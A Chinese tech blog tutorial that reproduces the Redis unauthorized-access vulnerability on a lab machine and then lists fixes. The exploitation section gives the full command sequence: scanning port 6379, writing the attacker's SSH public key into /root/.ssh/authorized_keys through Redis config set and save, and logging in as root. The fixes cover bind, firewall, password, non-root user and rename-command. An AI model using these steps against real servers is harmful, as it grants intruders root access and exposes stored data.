百度360必应搜狗淘宝本站头条
当前位置:网站首页 > 技术教程 > 正文

Redis未授权访问漏洞复现教程(redis未授权访问漏洞复现教程视频)

mhr18 2024-11-08 12:11 23 浏览 0 评论

1、漏洞背景

Redis因配置不当会导致未授权访问漏洞而被攻击者恶意利用。如果没有开启认证且Redis以root用户运行,任意用户可以在访问目标服务器的情况下将SSH公钥写入root用户文件,通过使用对应SSH私钥登录目标服务器,致使服务器权限被获取、数据信息泄露或加密勒索等事件发生,严重危害业务正常服务。

2、漏洞描述及影响

在默认情况下,Redis是允许远程连接的,默认端口是6379。在没有开启认证并且任意用户可以访问目标服务器的情况下,攻击者可以利用Redis的相关方法未授权访问Redis。如果运行Redis的用户是root用户,攻击者在本地创建一对公私钥(公钥文件:~/.ssh/id_rsa.pub;私钥文件:~/.ssh/id_rsa),再利用redis-cli客户端对靶机的redis-server进行远程连接,将公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中, SSH公私钥匹配成功后可登录目标服务器。

Redis作为数据库,保存着用户信息等重要数据信息。如果攻击者未授权访问Redis,将会导致数据信息和服务器信息泄露,甚至出现代码执行、获取服务器权限等恶意操作。

该漏洞若被利用,需要满足的条件如下:

(1)Redis以root用户运行;

(2)Redis无密码或弱密码进行认证;

(3)Redis监听在0.0.0.0公网上(绑定在0.0.0.0:6379,对公网开放);

(4)目标服务器开放了SSH服务,而且允许使用密钥登录。

3、漏洞检测与利用

(1)、此次的搭建了一个靶机,地址是192.168.110.128,利用F-NAscan、nmap等扫描工具,扫描目标地址端口开放情况,如果22(SSH)、6379(Redis)端口处于开放状态,则目的地址可能存在此漏洞。

如果检测到目标地址6379处于开放状态,可利用6379端口检测、获取目标地址的Redis信息:

# nmap -A -p6379 --script=redis-info 192.168.110.128(目标地址)

(2)尝试未授权访问靶机Redis,通过以下命令连接靶机Redis并查看info:

# ./redis-cli -h 192.168.110.128

(3)在本地(攻击方)生成一对ssh key(如果已经生成过则可跳过此步骤。默认情况下,生成后在本地目录下的.ssh目录下):

# ssh-keygen -t rsa

(4)将生成的公钥写入foo.txt(加上\n\n是为了不破坏ssh public key,公钥如图所示):

# cd ~/.ssh
# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

(5)将foo.txt写入Redis,连接靶机Redis,设置备份路径为/root/.ssh/,设置备份文件的名称为authorized_keys并保存,完成文件写入(crackit是设置的 key,可随意指定):

# cat /tmp/foo.txt | /usr/redis/./redis-cli -h 192.168.110.128 -p 6379 -x set crackit
# ./redis-cli -h 192.168.110.128 -p 6379 
192.168.110.128:6379> config set dir /root/.ssh/ 
OK 
192.168.110.128:6379> config get dir 
1) "dir" 
2) "/root/.ssh" 
192.168.110.128:6379> config set dbfilename "authorized_keys" 
OK 
192.168.110.128:6379> save 
OK

(6)利用私钥远程登录目标服务器,默认会使用 id_rsa, 如果改过文件名则可以用 -i 参数来自指定文件:

# ssh root@192.168.110.128 -i id_rsa

4、修复建议

(1)禁止Redis对公网开放,指定Redis使用的网卡。Redis本来就是作为内存数据库,只要监听在本机即可。可通过修改redis.conf配置文件中的"#bind 127.0.0.1" ,去掉前面的"#"即可,或修改为指定访问源IP访问(需要重启Redis才能生效)。

# bind 127.0.0.1

(2)防火墙限制访问源IP。如果正常业务中Redis服务需要被其他服务器来访问,可以设置iptables策略仅允许指定的IP来访问Redis服务。

# iptables -A INPUT -s [可访问IP] -p tcp --dport 6379 -j ACCEPT

(3)修改Redis默认端口,将默认的6379端口修改为其他端口。

(4)设置密码访问认证,可通过修改Redis.conf配置文件中的"requirepass" ,去掉前面的“#”并设置复杂密码(需要重启Redis才能生效)。

# requirepass rt%dPf&2342UWF#^32

(5)Redis使用普通用户权限,禁止使用root权限启动Redis,这样可以保证在存在漏洞的情况下攻击者也只能获取到普通用户权限,无法获取root权限(需要重启Redis才能生效)。创建一个无home目录和无法登陆的普通权限账号

# useradd -M -s /sbin/nologin [用户名]

(6)修改Redis config指令。在redis2.8.1及redis3.x(<3.0.2) 版本下存在eval沙箱逃逸漏洞,攻击者可通过该漏洞执行任意Lua代码。禁用config指令有助于避免恶意操作。具体的congfig指令有:FLUSHDB, FLUSHALL, KEYS,PEXPIRE, DEL, CONFIG, SHUTDOWN, BGREWRITEAOF, BGSAVE, SAVE, SPOP, SREM, RENAME,DEBUG, EVAL等。在Redis配置文件redis.conf中配置rename-command项"RENAME_CONFIG",这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度,缓解攻击操作。下述配置将config/flushdb/flushall设置为空(即禁用该命令),也可命名一些攻击者难以猜解的名字,保存后执行/etc/init.d/redis-server restart重启生效。

rename-command CONFIG “”
rename-command CONFIG b840fc02d524045429941cc15f59e41cb7be6c52
rename-command flushall “”
rename-command flushdb “”
rename-command shutdown shotdown_test

(7)及时更新安全补丁,升级redis到最新版,防止新漏洞被利用。

相关推荐

Java面试题及答案总结(2025版)

大家好,我是Java面试陪考员最近很多小伙伴在忙着找工作,给大家整理了一份非常全面的Java面试题及答案。涉及的内容非常全面,包含:Redis、Linux、SpringBoot、Spring、MySQ...

Java面试题及答案最全总结(2025春招版)

大家好,我是Java面试分享最近很多小伙伴在忙着找工作,给大家整理了一份非常全面的Java面试题及答案。涉及的内容非常全面,包含:Spring、MySQL、JVM、Redis、Linux、Spring...

Java面试题及答案最全总结(2025版持续更新)

大家好,我是Java面试陪考员最近很多小伙伴在忙着找工作,给大家整理了一份非常全面的Java面试题及答案。涉及的内容非常全面,包含:Spring、MySQL、JVM、Redis、Linux、Sprin...

蚂蚁金服面试题(附答案)建议收藏:经典面试题解析

前言最近编程讨论群有位小伙伴去蚂蚁金服面试了,以下是面试的真题,跟大家一起来讨论怎么回答。点击上方“捡田螺的小男孩”,选择“设为星标”,干货不断满满1.用到分布式事务嘛?为什么用这种方案,有其他方案...

测试工程师面试必问的十道题目!全答上来的直接免试

最近参加运维工程师岗位的面试,笔者把自己遇到的和网友分享的一些常见的面试问答收集整理出来了,希望能对自己和对正在准备面试的同学提供一些参考。一、Mongodb熟悉吗,一般部署几台?部署过,没有深入研究...

10次面试9次被刷?吃透这500道大厂Java高频面试题后,怒斩offer

很多Java工程师的技术不错,但是一面试就头疼,10次面试9次都是被刷,过的那次还是去了家不知名的小公司。问题就在于:面试有技巧,而你不会把自己的能力表达给面试官。应届生:你该如何准备简历,面试项目和...

java高频面试题整理

【高频常见问题】1、事务的特性原子性:即不可分割性,事务要么全部被执行,要么就全部不被执行。一致性或可串性:事务的执行使得数据库从一种正确状态转换成另一种正确状态隔离性:在事务正确提交之前,不允许把该...

2025 年最全 Java 面试题,京东后端面试面经合集,答案整理

最近京东搞了个TGT计划,针对顶尖青年技术天才,直接宣布不设薪资上限。TGT计划面向范围包括2023年10月1日到2026年9月30日毕业的海内外本硕博毕业生。时间范围还...

idGenerator测评

工作中遇到需要生成随机数的需求,看了一个个人开发的基于雪花算法的工具,今天进行了一下测评(测试)。idGenerator项目地址见:https://github.com/yitter/IdGenera...

2024年开发者必备:MacBook Pro M1 Max深度体验与高效工作流

工作机器我使用的是一台16英寸的MacBookProM1Max。这台电脑的表现堪称惊人!它是我用过的最好的MacBook,短期内我不打算更换它。性能依然出色,即使在执行任务时也几乎听不到风扇的...

StackOverflow 2022 年度调查报告

一个月前,StackOverflow开启了2022年度开发者调查,历时一个半月,在6月22日,StackOverflow正式发布了2022年度开发者调查报告。本次报告StackO...

这可能是最全面的SpringDataMongoDB开发笔记

MongoDB数据库,在最近使用越来越广泛,在这里和Java的开发者一起分享一下在Java中使用Mongodb的相关笔记。希望大家喜欢。关于MongoDB查询指令,请看我的上一篇文章。SpringD...

Mac M2 本地部署ragflow

修改配置文件Dockerfile文件ARGNEED_MIRROR=1//开启国内镜像代理docker/.envREDIS_PORT=6380//本地redis端口冲突RAGFLOW_IMA...

别再傻傻分不清!localhost、127.0.0.1、本机IP,原来大有讲究!

调试接口死活连不上?部署服务队友访问不了?八成是localhost、127.0.0.1、本机IP用混了!这三个看似都指向“自己”的东西,差之毫厘谬以千里。搞不清它们,轻则调试抓狂,重则服务裸奔。loc...

我把 Mac mini 托管到机房了:一套打败云服务器的终极方案

我把我积灰的Macmini托管到机房了,有图有真相。没想到吧?一台在家吃灰的苹果电脑,帮我省了大钱!对,就是控制了自己的服务器,省了租用云服务器的钱,重要数据还全捏在自己手里,这感觉真爽。你可...

取消回复欢迎 发表评论: